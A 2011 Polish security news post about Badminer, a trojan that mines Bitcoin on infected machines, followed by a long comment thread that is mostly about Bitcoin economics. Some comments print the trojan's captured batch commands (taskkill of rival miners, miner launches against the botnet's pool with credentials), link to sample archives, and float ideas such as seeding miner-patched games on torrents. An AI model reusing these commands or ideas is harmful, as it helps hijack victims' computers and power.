11:31
17/8/2011

W sieci pojawił się trojan, który po zainfekowaniu komputera podkrada jego moc obliczeniową (GPU) by generować wirtualną walutę, czyli Bitcoiny.

Badminer, trojan generujący Bitcoiny

Malware, który roboczo nazwano Badminer, przeprowadza analizę zainfekowanego sprzętu i w przypadku braku silnego GPU, korzysta z normalnego CPU. Tzw. mining (czyli w uproszczeniu generowanie) Bitcoinów polega na przeliczaniu hashy transakcji z sieci P2P wirtualnej waluty i jest czasochłonne. Nic więc dziwnego, że przestępcy wpadli na pomysł stworzenia botnetu z zainfekowanych maszyn — komputer z kartą AMD Radeon 6990 ma wydajność 758.82 Mhash/s, co pozwala w ciągu miesiąca na wydobycie ok. 13.71 Bitcoinów (ok. 400PLN).

BitCoin

BitCoin

Warto wspomnieć, że oprócz trojana, który wykorzystuje komputer ofiary do wydobywania Bitcoinów (i nabijania rachunku za prąd), istnieją również bardziej “niegrzeczne” skrypty. Ich zadaniem jest po prostu wyszukanie i kradzież portfela z Bitcoinami na zainfekowanym systemem. Podobny moduł jest także obecny w Metasploicie.

P.S. A tymczasem, polski Bitomat.pl ciągle nie podniósł się po awarii. Utracone BitCoiny zostaną jednak użytkownikom Bitomatu oddane przez Mt.Gox, który przejął naszą rodzimą giełdę bitcoinów.


Dowiedz się, jak zabezpieczyć swoje dane i pieniądze przed cyberprzestępcami. Wpadnij na nasz kultowy ~3 godzinny wykład pt. "Jak nie dać się zhackować?" i poznaj kilkadziesiąt praktycznych i przede wszystkim prostych do zastosowania porad, które skutecznie podniosą Twoje bezpieczeństwo i pomogą ochronić przed atakami Twoich najbliższych. Uczestnicy tego wykładu oceniają go na: 9,34/10!

Na ten wykład powinien przyjść każdy, kto korzysta z internetu na smartfonie lub komputerze, prywatnie albo służbowo. Wykład prowadzimy prostym językiem, wiec zrozumie go każdy, także osoby spoza branży IT. Dlatego na wykład możesz spokojnie przyjść ze swoimi rodzicami lub mniej technicznymih znajomych. W najbliższych tygodniach będziemy w poniższych miastach:

Zobacz pełen opis wykładu klikając tutaj lub kup bilet na wykład klikając tu.

41 komentarzy

Dodaj komentarz
 1. oczywiście Pan Bartek nie przyznał się do winy :P
  Korzystał z technologii której nie rozumiał..

 2. a co jeśli (hipotetycznie) sam mam zapuszczonego jakiegoś minera na moim sprzęcie? jeśli ktoś kopie, to zauważy spadek Mhashy. jak ktoś ma taki sprzęt i nie kopie, to… Szkoda, żeby sprzęt się marnował ;)
  a na poważnie, to już jakiś czas temu pojawiały się teorie, że taki twór prędzej czy później powstanie…
  A kwestia pana B. to inna bajka ;)

 3. Błąd w tekście:
  Bitcoinami na zainfekowanym “systemem”.
  Powinno być:
  Bitcoinami na zainfekowanym systemie.

 4. Eureka! To tak jak nielegalne drukarnie pieniędzy! Z tym, że taki nielegalny bitcoin niczym się nie różni od legalnego (hmm… brak zabezpieczeń, znaków wodnych, pasków, mikrodruku, itp…) toż to kradniesz idealna! I dość trudna do wyśledzenia… (nie każdy siedzi z włączonym analizatorem ruchu i nie gapi się co się łączy z jego komputerem i co przesyła).

  • Akurat jeżeli zużywa nadmiernie procesor to da się to zauważyć – ja mam na pulpicie gadżet pokazujący zużycie, ale głównie mam na myśli to, że zwiększone użycie procesora powoduje że wiatraczki się szybciej kręcą, system robi się głośniejszy itp. – nawet “zwykły” użytkownik jest w stanie zauważyć, że system spowolnił.

   Oczywiście zależy to w jaki sposób trojan wykorzystuje zasoby sprzętowe.

  • Raczej jak legalne drukarnie drukujące na zajumanych maszynach.

  • Jak próbowałem zainstalować minera na Windowsie, to AVG wywalił mi alert o wirusie (nazwa wirusa sugerowała, że to był alert zrobiony po to, by ostrzec kogoś przed ukrytą próbą instalacji minera).

 5. Pytanie czy to jest nielegalne? To raczej cała idea bitcoin jest wątpliwej jakości.

  • Zgadzam sie… Pralnia brudnych pieniedzy… i to jak na razie legalna…

   Andrzej

 6. Pomysł na bot-mining nie jest nowy i pewne było,że w końcu ktoś w życie to wprowadzi. Jest to możliwe dzięki rozwiązaniom typu: p2pool. Operatorzy kopalni zazwyczaj banują takie konta (np bitcoinpool.com wymaga obecności 50% czasu rundy i efektywności > 30% i tu ban leci z automatu). A co do bitomatu to działał ładnie po wtopie z rebootem więc się “podniósł”. Inna sprawa,że pare dni temu MtGox kupiła Bitomat i to jest przyczyną niedostępności serwisu….

  • Jak śpiewają niebieskie ptaszki, bot-mining jest również realizowany na innych platformach niż komputery. Think: telewizory, etc… — jak tutaj zauważyć “wzrost zużycia CPU”? :>

  • Telewizor sie przegrzewa i restartuje samoczynnie? :P

  • w takim razie chinczycy beda mieli najwiekszy udzial w Bitcoin-walucie i predzej czy pozniej to wyplynie

 7. Jest aplikacja na PS3 do bicia bitcoinów. Kwestię tego czy jest to opłacalne czy nie pominę. ;)

 8. ::Piotr Konieczny> Think: telewizory, etc… — jak tutaj zauważyć “wzrost zużycia CPU”? :> ::
  Idea CPU mining padła już w sumie dawno. Problem dotyczy wydajności (np bez 64bit+sse4 to poprostu nie ma sensu) i przeróżnych wynalazków mających na celu zastopowanie czegoś co się nazywa pool-hopping. Publicznie dostępne minery nie dają możliwości pracy rozproszonej nad jednym hashem – osobiście to tak do końca nie wiem czy to w ogóle możliwe jest … mój math skill za niski póki co :). Poole nadają tempo pracy – te duże potrafią rozwiązać blok np w 20 sekund a te małe mają np filtry efektywności (gdyż poproszenie o hash i brak wyniku powoduje podniesienie poziomu trudności bez zysku!). Sensowniej było by (imho) spatchować jakieś gry popularne (dodając p2pool minera :) i rozsiewać po torrentach – “czysty” dostęp do GPU :). Co innego gdyby taki botnet wykorzystywać do wysyłania w kosmos kopalni – masowo podając lewe/źle sformatowane pakiety :)) albo udając sieć klientów odrzucać potwierdzenia …
  A jak zobaczyć, że lodówka kopie bitocoiny ? Chyba tylko po lampkach na switchu :)))

 9. Zawsze jeszcze mozna wynajac sobie chmure i za pomoca hiperkmputerow to liczyc – wyjdzie bardzo oplacalnie…

  • To czemu tego nie zrobiłeś jeszcze? :) Nie wiem co kryje się pod pojęciem chmury w Twoim poście ale rozumiem, że miałeś na myśli klastry GPU. A jeśli chodziło Ci o rozwiązania typu GPU Cloud na Teslach Nvidii to baaaaardzo byś się rozczarował (łagodnie ujmując) :)))

 10. Zupełnie nie rozumiem koncepcji bitcoinów. Próbowałem i nie mogę. Za pracę komputera generuje się bitcoiny, które mogę wymienić na pieniądze? Skąd się te pieniądze biorą w takim razie (elektrownie dokładają?) i czy to nie powoduje inflacji? Może jakiś życzliwy mi to wyłoży, bo nie pojmuję.

  • Ekspertem to ja nie jestem (ani od BTC, ani od ekonomii); ale to chyba proste. Wartość czegokolwiek jest określana przeze to, ile ktoś inny jest w stanie za to zapłacić. Skoro ludzie kupują BTC, to mają one wartość. Nie ma znaczenia, ile pracy trzeba włożyć w ich wytworzenie. No, dla fiskusa pewnie ma (VAT), ale to inna sprawa.

   Czy tworzenie BTC wpływa na inflację? Raczej nie: nie zmienia ilości PLNów na rynku ani popytu na nie (przy założeniu że Ci, którzy inwestują w BTC, zainwestowaliby w co innego, gdyby BTC nie było).

   To tak samo, jak z dziełami sztuki. Też niewiele (w sensie materialnych środków, a nie talentu) trzeba, by je stworzyć, a są sporo warte. I oczywiście ich powstawanie nie wpływa na inflację (o ile nie jest tak, że nagle wszyscy polacy rzucają się do kupowania dzieł sztuki od obcokrajowców). (No i powstawanie dzieł sztuki jest w sferze zainteresowań fiskusa…)

  • Kluczem do zrozumienia co to bitcoin jest rozszyfrowanie sensu istnienia waluty (nie ważne jakiej). Świadomość umownej wartości papierowego banknocika reprezentowanej przez cyferki w tajnych bazach danych, daje szerszy obraz rzeczywistości. Następnie należy odpowiedzieć sobie na pytanie co(kto) tak naprawdę nadaje wartość walutom. Gdy już zbierzesz to wszystko do kupy zauważysz, że 100PLN rok temu =/= 100PLN dzisiaj. Do tego dodaj wszystkie oszukańcze akcje banków (nie ważne w jakiej skali), brak możliwości skutecznej walki z krętactwami, bezwarunkowa przezroczystość obrotu własnymi (wirtualnymi!) dobrami (pięniędzmi w banku) wobec systemu,itd…i wtedy zobaczysz, że bitcoiny jako rozproszony, samokontrolujący się system transakcji, samogenerujący ilość monet w obrocie (z ograniczeniami i zasadami oczywiście) niezależnie od lokalnych inflacji/kryzysów itp, jest naturalnym (zgodnym z zasadami ewolucji i ideą rozwoju) krokiem w przód. Bez ciemnych instytucji i systemowych wymuszeń, ty jako użytkownik bitcoinów nadajesz im wartość. Natomiast jeśli chodzi techniczny aspekt pracy komputera + wynagrodzenie z tego tytułu proponuję wiki na bitcoin.org.

  • @d3cker: wyluzuj i nie indoktrynuj:

   1. “brak możliwości skutecznej walki z krętactwami” (w tradycyjnych walutach)
   A czy przypadkiem pełna anonimowość, o której tak dużo mówią bitcoinowcy, właśnie nie utrudnia walki z krętactwami? Zależy oczywiście od definicji “krętactwa”; dla mnie to np. pranie brudnych pieniędzy, dla Ciebie mogą to być “oszukańcze akcje banków”…

   2. “bezwarunkowa przezroczystość obrotu […] pięniędzmi w banku wobec systemu”
   Ale to przecież operacje w bitcoinach są zupełnie jawne dla wszystkich! Dużo łatwiej wyciągnąć kasę z bankomatu i przekazać ją pod stołem niż przelać bitcoiny tak, żeby nikt nie wiedział.

   3. “bitcoiny jako rozproszony, samokontrolujący się system transakcji, samogenerujący ilość monet w obrocie (z ograniczeniami i zasadami oczywiście) niezależnie od lokalnych inflacji/kryzysów itp, jest naturalnym (zgodnym z zasadami ewolucji i ideą rozwoju) krokiem w przód”
   Pfff… miałem nadzieję, że po 1989 taki język naturalnie zaniknie. “Niezależność od lokalnych kryzysów”? Cena złota też jest niezależna od kryzysów? A co jest stabilniejsze, BTC czy PLN?

  • Nie mówię o inflacji w złotówkach, ale w właśnie w bitcoinach, skoro każdy może je bić na własną rękę, to czemu nie wystąpi sytuacja jak w niektórych MMO, gdzie farmienie powodowało, że każdy mógł kupić wszystko?
   “…samokontrolujący się system transakcji, samogenerujący ilość monet w obrocie…” – Ten trojan wydaje się temu przeczyć.
   Na wiki dużo jest jechania po bankach i po tym, jak działa rynek (wszyscy korzystający z tej waluty muszą takie wstawki dawać do swoich wypowiedzi?), ale nie ma rzeczowego wyjaśnienia jak to dokładnie działa i jak to się samokontroluje i zabezpiecza.

  • Trojan jest biedny to raz. Dwa jest bardzo dokładnie wyjaśnione jak to działa – w skrócie: ograniczenie monet w obiegu to 21 milionów, poziom trudności bardzo skoczył i w pojedynkę to za dużo nie wykopiesz. kopanie “zabezpiecza” sieć bitcoin i prawdopodobieństwo, że wygenerujesz blok z lewą operacją transferu, cały czas spada, nagroda za rozwiązany blok będzie scięta o połowe… itd. Weź poczytaj dokładniej a nie biadolisz. Jakby było po łebkach opisane to by nikt w to nie klikał.
   WSZYSTKO co chcesz wiedzieć od strony technicznej jest tu: https://en.bitcoin.it/wiki/Category:Technical

  • @m:
   Ja tu na pełnym luzie. Piątek w końcu :)

   Napisałeś:
   Ad.1.
   “A czy przypadkiem pełna anonimowość, o której tak dużo mówią bitcoinowcy, właśnie nie utrudnia walki z krętactwami?”
   Ad.2.
   “Ale to przecież operacje w bitcoinach są zupełnie jawne dla wszystkich! Dużo łatwiej wyciągnąć kasę z bankomatu i przekazać ją pod stołem niż przelać bitcoiny tak, żeby nikt nie wiedział.”

   Hm wyświetla mi się logic error jak to czytam. W końcu jak jest? Anonimowo czy jawnie :) ? Skup się:
   – transakcja (konta, kwota) jest jawna jak mało co na tym świecie.
   – fizyczne źródło i cel są ciężkie do namierzenia.

   Co mi to daje? Ano to, że widząc blok z dużą sumą przesłany na konto jakiegoś kantoru wiem, że lada chwila (prawdopodobnie) będzie zawirowanie cenowe – albo ktoś będzie sztucznie cene podbijał albo potrzebuje lokalnej waluty i to szybko więc puści poniżej kursu. Nie wiem kto to i skąd to robi i szczerze mnie to wali. Wiem natomiast gdzie patrzeć żeby ew. zareagować. Możesz to samo powiedzieć o PLN/USD/EUR…
   Pozatym ja pisałem o krętactwach przekraczających możliwości operacyjne zwykłego człowieka, dużej firmy a nawet korporacji(zapomniałem, że nie jest to oczywiste dla każdego). Precyzując: miałem na myśli sztuczne konflikty “stymulujące” gospodarki kosztem nieświadomych mas.

   Ad.3. Czekaj czekaj jeśli pijesz w kierunku totalitarnych aspektów bitcoinów (a zwłaszcza przyczyn ich powstania) to słowo daje ale nie rozumiem. Może wyjaśnię o co mi chodziło: prędzej zaufam algorytmom niż jakiemukolwiek figurantowi wmawiającemu ludziom, że wszystko pod kontrolą i jest ok.Wierzyć mu muszę na słowo gdyż raporty finansowe banków nie podlegają weryfikacji (czytaj kontroli)…
   Dzięki BTC sen jawą się staje.
   A tak na marginesie to szlag trafił marzenia o finansowej wolności w 1986. W ’89 tylko ekipa i kolory się zmieniły. Nie wiem na ile kojarzysz akcję ale w owym 89 przy tzw “obradach” nie było tych którzy z prawdziwym poświęceniem o te “obrady” walczyli (czyli oldskool z mega skillem spod znaku S z kotwicą) – a na końcu elektryk z tramwajarzem decydowali o losie kraju a doktora fizyki (doktorat z mechaniki kwantowej …) usunęli na prawie 25 lat. Dobra za daleko pojechałem ale pamiętaj, że rzeczywistość “telewizyjna” … jest tylko “telewizyjna”.
   I na koniec “cena złota”. Własnie… za wiki:
   Cena – ilość pewnego dobra (najczęściej pieniądza), za przyjęcie której sprzedający jest gotów zrzec się swoich praw do danego dobra. Nie wiem co Twoje pytanie sugeruje, serio.
   Wg mnie:
   – cena nie odzwierciedla w pełni wartości – podlega wachaniom/kryzysom/spekulacjom. Cena reprezentowana jest w walutach, których wartość jest zmienna.
   – ilość złota jest ograniczona i w sumie nieduża, więc prawdziwą wartość nadają mu użytkownicy
   …no analogie same się nasuwają.. z tą różnicą że o ile dobrze pamiętam transakcje w złocie są średnio legalne, gdyż nie ma możliwości kontroli :) Dlatego nie mogę kupić niczego za bryłkę złota, muszę ją najpierw spieniężyć.
   Podsumowując: wszystko co ma cenę podlega prawom rynku walutowego. Jednak jeśli ustalimy (dla przykładu w odrębnym,fikcyjnym układzie) że uncja złota kosztuje BEZPOŚREDNIO 1BTC to co wg Ciebie może spowodować zmianę?
   Tylko i wyłącznie umowa między kupującym i sprzedającym. Póki co kupowanie w BTC polega na przewalutowaniu (podobnie jak złoto).
   Inny przykład z lat 70/80 – poszła “fama”, że złoto to lipa i banda kretynów masowo zaczęła wyprzedawać swoje zasoby automatycznie doprowadzając do mega spadku ceny. Jednak złoto pozostało złotem. Nic się nie zmieniło. Wystarczyło pół roku, żeby cena wróciła do “normy” Wartość była “stała” natomiast przewalutowana cena była wynikiem konkretnej spekulacji.
   A co do stabilności… Ujmę to tak. Jeśli stabilny kurs PLN to wszystko czego trzeba Ci do szczęścia to ok. Mnie (osobiście) bardziej interesuje wartość, potencjał i możliwość pomnożenia. Ponadto BTC jest młodą walutą i nie da się w 100% określić co będzie dalej. Ale czy potrafisz określić stan PLN za 2 miesiące? A pamiętasz,że taka waluta lokalna w naszym kraju ulega ciągłej dewaluacji w wyniku rosnącego zadłużenia?… dobra , styka już…

  • @d3cker: krótko, żeby nie trollować:

   ad 1,2: Przecież piszę: “pełna anonimowość” (użytkowników), “zupełnie jawne operacje” — czytaj uważnie. Moim zdaniem te dwie cechy sprzyjają matactwom, a nie im zapobiegają.

   ad “krętactwa […] sztuczne konflikty “stymulujące” gospodarki kosztem nieświadomych mas”
   A jakoś tak bardziej konkretnie?

   ad 3: Piłem do propagandowego stylu Twojej wypowiedzi.

   ad “niestabilność”: pisałeś, że system bitcoinów jest “niezależny od lokalnych inflacji/kryzysów”, to Ci napisałem, że nie bardziej niż inne waluty. Podobieństw do złota jest sporo, różnic równie dużo. Jedna z ciekawszych jest taka, że stosunkowo łatwo (w odróżnieniu także od klasycznych walut) trwale usunąć BTC z rynku (vide oficjalna wersja sprawy bitomatu.pl). Ktoś wie, czy autorzy systemu rozważali taką możliwość?

  • @m

   Ad 1.
   Czyli boli Cie, że Heniek może Tomkowi dać zapłatę za skopanie ogródka bez wiedzy GUS ? – bo o takich matactwach w przypadku btc możemy mówić. No max widzę sprzedaż jakiegoś Opla Astrę – ziomek ziomkowi. Co ty prokurator? policjant? Albo gorzej…?

   Ad 2.
   I Wojna Światowa
   II Wojna Światowa
   Wojna w Wietnamie
   Wojny w regionach wschodnich:
   – stymulowane sytuacją Izreala (sam z kupą kasy po środku wrogów ).
   – stymulowane dostępnością surowców i zakresem wpływów (Irak vs Iran, Usa vs Irak…)
   No i efekt ostatniego dziesięciolecia: Wojna z Terroryzmem.
   ZANIM cokolwiek napiszesz poczytaj tylko na temat tych 3 pierwszych (pod kątem źródeł finansowania i zdarzeń poprzedzających). Jeśli nic nie wywnioskujesz to odpuść reszte. I kończmy dyskusję.

   Ad.3.
   Nazwanie mojego stylu propagandowym co ma niby wnieść do dyskusji? A nawet jeśli sieje propagandę to sam fakt robienia tego nie umniejsza wartości argumentów (których chyba nie ogarniasz – w sumie to napisałeś wcześniej ze ekspert z ciebie żaden…troche Cie to usprawiedliwia).
   Zaginione bitcoiny. Pomyślmy. Masz w ręku 500PLN i nagle poof zawiał wiatr i poleciałooo..pech chciał że w ognisko. Zjarało się doszczętnie. I co? … ? I po PLN.
   Tak autorzy przewidzieli taką możliwość. Nie ma różnicy czy poleci plik z portfelem BTC czy portfel z PLN wpadnie do czeluści piekieł. Taka czy inna waluta zostaje wyprowadzona z obiegu i koniec. Zresztą ten mechanizm ktoś w przeszłości wykorzystał (nie proś abym pisał kto i kiedy…. bo “nie wolno” :)). Państwa, które wykorzystywały złoto jako surowiec do produkcji monet bardzo szybko utraciły swoje dobra (i znaczną część waluty). Jak ? Ano poprzez sprytne wyprowadzenie monet … jako surowca właśnie. I teraz powiedz, co bardziej bezpieczne: wirtualne (PLN/BTC) czy fizyczne (złote monety :).
   A co do regulacji wartości. Napisałeś, że niezależność BTC jest porównywalna z resztą walut. Gdyby tak było, nie byłoby sensu ich tworzyć (mam na myśli BTC). Nie rozumiesz jaką rolę pełni tzw. Bank Światowy, po co są Narodowe Banki i co to dług publiczny. Nie masz wpływu na to co z “Twoją” walutą się dzieje – żadnego.Ba pewnie nie wiesz nawet skąd się bierze! W morzu dezinformacji jesteś jedynie biernym użytkownikiem. Z BTC jest tak, że jej wartość dopiero “powstaje”, rynek coprawda raczkuje ale zaufanie wbrew wszystkiemu rośnie. Bez niespodziewanych wymuszonych regulacij – masz algorytm i koniec (ten też można zmienić owszem ale użytkownicy muszą zaakceptować ew. zmiany – podejrzewam że pierwsza poważna zmiana nastąpi po wykopaniu 21milionów).
   Jeśli patrzysz na BTC jako na “środek transportu” (w sensie dziadek z kanady przesyła mi BTC zamiast chrzanić się z kursami, prowizjami i lagami) to rozumiem Twój sceptycyzm. Dlatego TY Człowieku zrozum, że to jest tak samo realny pieniądz jak ten z kieszeni…

  • @d3cker: lol
   @Sergi: to nie tak, że każdy może generować bitcoiny. Generuje się tzw. bloki, za które jest nagroda wypłacana w nowych BTC. Nagroda maleje z czasem w taki sposób, że łączna suma nagród nie przekroczy 21 milionów. W tym sensie inflacja BTC nie zagraża. Za to widzę szansę deflacji, tak jak pisałem poprzednio — przez gubienie pieniędzy. (@d3cker: zgubione złotówki Bank Centralny dodrukuje, jeśli będzie taka potrzeba!) Ale deflacja to żadne zagrożenie — w jej wyniku Twoje bitcoiny tylko zyskują na wartości.

  • @m:
   no popisałeś się teraz.
   Zgubione banktnoty to inaczej uśpiona(snem wiecznym) gotówka. Zmarnowane dobro i nic więcej.
   Ale wróćmy do sytuacji gdzie mam 500PLN ale tym razem ja tylko oświadczam(!), że spłonęły mi banknoty. Wg Twojej super teorii Bank Centralny w trosce o stabilizacje monetarna dodrukuje spalone pieniążki. Po całej akcji ja wyciągam z kieszeni te 500PLN i mówie prima aprilis.
   Co wg Ciebie dalej się dzieje? To nie tak działa…
   Wartość pieniądza w głównej mierze opiera się na “deklaracji” skladanej przez Bank Centralny w Banku Światowym. W skład “deklaracji” wchodzą kredyty udzielone bankom lokalnym, obligacje skarbowe…itd A cóż to w ogóle Bank Światowy? Ano(wiki):Międzynarodowa Korporacja Finansowa, Międzynarodowe Centrum Rozstrzygania Sporów Inwestycyjnych i Agencja Wielostronnych Gwarancji Inwestycji… mnie już mdli. Ale dalej: Bank Światowy nie jest bankiem w ścisłym tego słowa znaczeniu. Zapewnia długoterminowe pożyczki o preferencyjnym oprocentowaniu dla najbardziej potrzebujących krajów członkowskich oraz przedsiębiorstw publicznych (po otrzymaniu gwarancji rządowych), dotacje, pomoc techniczną… starczy. Czyli owa “deklaracja” to poprostu zaciągnięty dług. Jak to w pożyczkach są odsetki. Problemem dla np naszego kraju jest wyrobić same odsetki. A jak się nie wyrobi to co się dzieje? Kolejna pożyczka…. Pomyśl teraz globalnie jak to wyglada. Wybacz ale na tą chwilę wole algorytm.
   A na koniec(wiki):W rozważaniach teoretycznych na temat optymalnej ilości pieniędzy w gospodarce pojawia się pomysł, że całkowita wartość nominalna pieniędzy w obiegu powinna odpowiadać całkowitej wartości towarów i usług dostępnych na rynku….i to jest właśnie opis bitcoina. Wartość tworzy zapotrzebowanie. Bitcoiny mogą osiągnąć maksymalną ilość 21 milionów. Niby mało…ale liczone są do ośmiu miejsc po przecinku. Gdy zapotrzebowanie będzie dalej rosło ludzie zaczną wymieniać się mniejszymi kwotami – mBTC,μBTC… A jak i to się skończy to mass upgrade softu…

   Właśnie przeczytałem: Udoskonal to wiki i zarabiaj bitcoiny. Patrze jeszcze raz na Twojego posta dochodzę do wniosku, że to koniec dyskusji…

   Pozdrawiam,

 11. Trochę ciekawostek z botnetu:

  Resolved : [x.miners.in] To [66.228.53.52]
  Resolved : [x.miners.in] To [66.228.53.5]
  Resolved : [x.miners.in] To [66.228.53.56]
  Resolved : [x.miners.in] To [66.228.53.55]
  Resolved : [x.miners.in] To [173.255.204.19]
  Resolved : [x.miners.in] To [96.126.112.223]
  Resolved : [x.miners.in] To [96.126.112.23]
  Resolved : [x.miners.in] To [173.255.202.228]

  ping -n 15 127.0.0.1
  taskkill /f /im cgminer.exe
  taskkill /f /im svchoost.exe
  taskkill /f /im mamatije.exe
  taskkill /f /im mamatije2.exe
  mamatije2.exe -a 59 -g no -o http://x.miners.in:8332/ -u mrdd_ludacha -p mama1 -t 2

  • Oj bieda bieda :) Wygląda na mix phoenix’a i cgminera. Tak czy siak to coś dość tempe się wydaje. Ta ciekawostka nie używa GPU. Wersja bez 2 w execu kopie na GPU:
   ————————————————-
   http://b.mobinil.biz:8332/
   cgminer.exe -o http://b.mobinil.biz:8332/ -u redem_g -p redemxxxxxxx -I 6
   mamita.exe -a 59 -g yes -o http://b.mobinil.biz:8332/ -u redem_guild -p redem -t 2
   mamita.exe -a 59 -g yes -o http://b.mobinil.biz:8332/ -u redem_guild -p redem -t 2

   Resolved : [ b.mobinil.biz ] To [ 46.4.123.12 ]
   Resolved : [ b.mobinil.biz ] To [ 108.60.208.157 ]
   Resolved : [ b.mobinil.biz ] To [ 69.42.216.173 ]
   Resolved : [ b.mobinil.biz ] To [ 46.4.116.147 ]

   looking his net size i can say this guy is rich lol

   Here u can download sfx archives :
   http://adf.ly/2CP8k only for testing purposes

   hosting infos:
   http://whois.domaintools.com/46.4.123.12
   ————————————————-
   :)
   A masz może jakiś zrzucik pakietów jak to rozmawia z poolem ?

  • Ogólny opis procesu kopania tym trojanem/trojanami:

   1. sprawdź czy jest miner/trojan już zainstalowany (cgminer np)
   2. jeśli tak to killim i restart z własnymi opcjami
   3. jeśli nie ma softu do kopania to wypakuj z rara własną kopie i odpal

   Tak jak w ciemno wspomniałem wcześniej, miner działa z nieludzką agresywnością. Ninja to nie jest.
   A swoją drogą infekcje którędy wiadomo czy grzebać dalej? ;]

 12. Sama idea zastąpienia CPU – > GPU jest jak najbardziej legalna i chwali się ideę. Pomysł trojana, który by tylko to robił, byłyby super. Nielegalne jest wykorzystanie trojana na cudzych komputerach i to bez ich wiedzy… Należałoby się sprostowanie, bo po artykule można stwierdzić, że użycie GPU jest nielegalne przy generowaniu bitcoin’ów.

  Tu jest ciekawe porównanie Mhash/s:

  http://www.h-online.com/security/news/item/Trojan-uses-GPU-to-mine-Bitcoins-1324539.html?view=zoom;zoom=1

 13. “kradzież portfela z Bitcoinami na zainfekowanym systemEM” – literówka w przedostatnim zdaniu (przed PS.)

 14. Duzo bardziej zyskodajna metoda wykorzystania duzych mocy gpu jest ak narazie przeliczanie hashy z telefonow sl3 na plik cod. Przy wydajnym komputerze przeliczenie zajmuje mniej wiecej 24h a placone jest ok 50zl za szt.

 15. A tak z ciekawości, pytanie do tych, którzy sami uruchamiają minery. Czy wiecie co tak na prawdę liczy wasz komp? A może przy okazji szuka liczby pierwsze dla NSA lub innej agencji (tzn czy ktoś na prawdę weryfikował kod minera – bo jakoś nie wyobrażam sobie, żeby to było closed-source…) :-)

 16. Probowal ktos “wydobywac” btcki przez iphony lub androidy? :P

 17. Panowie d3cker i m – jestem pod wrażeniem Waszej dyskusji.

 18. Wkradł wam się mały błąd: 13 bitcoinów to nie 400 zl, a 13*600*3 => ponad 20tys.
  nie ma fizycznej mozliwosci wykopać tyle na jednej karcie radeon :-)

  • A popatrzyles na date?

  • Ale nawet jakby to bylo 10 zl albo nawet 1 zl -dziennie

   to przy 10 tysiacach zombie masz 300 000-30 000 zl miesiecznie !

   ch*j niech nawet robi ta zlotowke, to ogromne pieniadze,
   niech robi 50 gr dziennie to 15 000zl miesiecznie,
   dziennie jestes w stanie zainfekowac 50-100 kompow srednio
   100-200 dni i masz 10 tys zombie i jestes ustawiony.

 19. Ostatnio wykryłem coin miner na moim systemie. Niestety ciezko jest go usunac, program antywirusowy nie jest w stanie. Sprzet mam dosc drogi, bo az 23 tys zl. Karta rtx3090 24gb oc, i kurwa taka kurwe to bym rozszarpal na miejscu jak bym go znalazl.

Twój komentarz

Zamieszczając komentarz akceptujesz regulamin dodawania komentarzy. Przez moderację nie przejdą: wycieczki osobiste, komentarze nie na temat, wulgaryzmy.

RSS dla komentarzy: